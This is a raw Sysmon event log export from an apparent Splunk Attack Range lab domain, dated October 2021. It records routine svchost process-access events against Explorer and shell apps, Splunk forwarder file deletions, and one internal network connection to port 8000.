07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103101Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103100Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103099Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103098Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103097Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103096Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103095Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103094Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103093Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103092Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103091Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103090Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103089Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103088Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103087Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103086Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103085Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103084Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103083Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103082Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103081Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103080Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103079Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103078Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103077Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103076Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE78-615A-DC00-00000000FC01}5256C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103075Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE78-615A-DC00-00000000FC01}5256C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103074Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.900{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE78-615A-DC00-00000000FC01}5256C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000103073Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.572{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA3CE0FE0E0C2443A6EB23217EBECBDF,SHA256=F849978D708EEE62D5857FA90EBE6094D8623D9E820092B3877A4259F96564A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080940Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:14.896{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AEA1E97E9409186456A670C21DFFA03,SHA256=56BDC9A09FADF0F6155AF8297621C1146F134DAEB627AF62CA9B74FDEFFB51B6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103105Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:13.400{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49491-false10.0.1.12-8000- 23542300x800000000000000080941Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:15.908{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89756F34E99F51C4F24AFA3875BEA72F,SHA256=9B54A6869AC5B52FD968F0ABAFCD669A34CD702FAB1D5BA99A56BD25DB543F87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103107Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:15.619{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=789E1719E7C876576A1E2F622FCC3D0E,SHA256=A4581DA18F3E92A38B1AD462D164336F9E1C53055516CF322C1C061EC75E7BB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103106Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:15.010{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 